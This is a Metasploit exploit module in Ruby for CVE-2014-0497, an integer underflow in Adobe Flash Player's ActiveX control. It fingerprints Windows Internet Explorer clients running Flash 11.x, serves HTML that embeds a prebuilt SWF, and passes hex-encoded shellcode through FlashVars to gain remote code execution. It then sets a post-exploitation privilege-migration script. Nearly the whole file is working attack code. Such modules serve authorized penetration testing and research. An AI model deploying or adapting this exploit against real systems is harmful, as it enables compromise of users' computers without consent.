rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/adobe_flash_avm2.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
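class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  # Module metadata for CVE-2014-0497 (Adobe Flash Player before 12.0.0.43,
  # addressed by Adobe APSB14-04 - see 'References' below).
  #
  # 'BrowserRequirements' limits delivery to Windows / Internet Explorer
  # clients that expose the Flash ActiveX control (CLSID below) and report a
  # Flash 11.x version; clients that do not match are not served anything
  # by the browser exploit server mixin.
  #
  # @param info [Hash] additional module info merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Adobe Flash Player Integer Underflow Remote Code Execution",
        'Description' => %q{
          This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player
          before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an
          integer underflow in several avm2 instructions, which can be turned into remote code
          execution under the context of the user, as exploited in the wild in February 2014. This
          module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP
          SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes
          rop chains for several Flash 11 versions, as exploited in the wild.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # vulnerability discovery and exploit in the wild
          'juan vazquez' # msf module
        ],
        'References' => [
          [ 'CVE', '2014-0497' ],
          [ 'OSVDB', '102849' ],
          [ 'BID', '65327' ],
          [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-04.html' ],
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx' ]
        ],
        # The payload is handed to the SWF hex-encoded through the FlashVars
        # of the HTML page (see #exploit_template), so no NOP sled is used.
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true
        },
        'DefaultOptions' => {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
          'Retries' => false
        },
        'Platform' => 'win',
        # Versions targeted in the wild:
        # [*] Windows 8:
        #   11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14
        #   11,6,602,167, 11,6,602,171 ,11,6,602,180
        #   11,7,700,169, 11,7,700,202, 11,7,700,224
        # [*] Before windows 8:
        #   11,0,1,152,
        #   11,1,102,55, 11,1,102,62, 11,1,102,63
        #   11,2,202,228, 11,2,202,233, 11,2,202,235
        #   11,3,300,257, 11,3,300,273
        #   11,4,402,278
        #   11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149
        #   11,6,602,168, 11,6,602,171, 11,6,602,180
        #   11,7,700,169, 11,7,700,202
        #   11,8,800,97, 11,8,800,50
        'BrowserRequirements' => {
          :source => /script|headers/i,
          :activex => [
            {
              clsid: '{D27CDB6E-AE6D-11cf-96B8-444553540000}',
              method: 'LoadMovie'
            }
          ],
          :os_name => OperatingSystems::Match::WINDOWS,
          :ua_name => Msf::HttpClients::IE,
          # Prefix match on the reported Flash version string ("11." only).
          :flash => ->(ver) { ver =~ /^11\./ }
        },
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2014-02-05',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Loads the SWF from disk once, before the browser exploit server starts,
  # so every client is served the same bytes from @swf.
  def exploit
    @swf = create_swf
    super
  end

  # Answers one request from a client that already passed the browser
  # requirements check.
  #
  # A URI ending in ".swf" is answered with the SWF loaded in #exploit;
  # any other URI gets the HTML page that embeds that SWF. The client's
  # profile has :tried cleared so the follow-up .swf request from the same
  # client is still answered (original author's note: "to allow request the
  # swf"; presumably :tried is the mixin's "already served" marker).
  #
  # @param cli client connection passed through to the send_* helpers
  # @param request incoming HTTP request (only #uri is read here)
  # @param target_info per-client target information forwarded to get_payload
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    # NOTE(review): "$" anchors at a line end, not strictly at end of string;
    # kept as-is so request routing stays identical to the original module.
    if request.uri =~ /\.swf$/
      print_status("Sending SWF...")
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash', 'Pragma' => 'no-cache' })
      return
    end

    print_status("Sending HTML...")
    tag = retrieve_tag(cli, request)
    profile = browser_profile[tag]
    profile[:tried] = false unless profile.nil? # to allow request the swf
    send_exploit_html(cli, exploit_template(cli, target_info), { 'Pragma' => 'no-cache' })
  end

  # Builds the HTML page that embeds the SWF.
  #
  # The SWF filename is randomised per response (4-6 alphabetic characters)
  # and the payload is passed to the SWF hex-encoded through the FlashVars
  # "id" parameter. Both ERB placeholders are resolved against the returned
  # binding by the caller.
  #
  # @param cli client connection forwarded to get_payload
  # @param target_info per-client target information forwarded to get_payload
  # @return [Array(String, Binding)] ERB template and the binding to render it with
  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(rand(4..6))}.swf"
    shellcode = get_payload(cli, target_info).unpack("H*").first

    html_template = <<~HTML
      <html>
      <body>
      <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
      <param name="movie" value="<%=swf_random%>" />
      <param name="allowScriptAccess" value="always" />
      <param name="FlashVars" value="id=<%=shellcode%>" />
      <param name="Play" value="true" />
      </object>
      </body>
      </html>
    HTML

    [html_template, binding]
  end

  # Reads the pre-built SWF shipped in the framework data directory
  # (exploits/CVE-2014-0497/Vickers.swf). This module does not generate the
  # SWF; the file is served unchanged by #on_request_exploit.
  #
  # @return [String] raw SWF bytes, read in binary mode
  # @raise [Errno::ENOENT] if the data file is missing from the install
  def create_swf
    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0497", "Vickers.swf")
    # binread reads the whole file in binary mode in one call; no need for
    # an open block that assigns its result to an outer local.
    ::File.binread(path)
  end
end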
135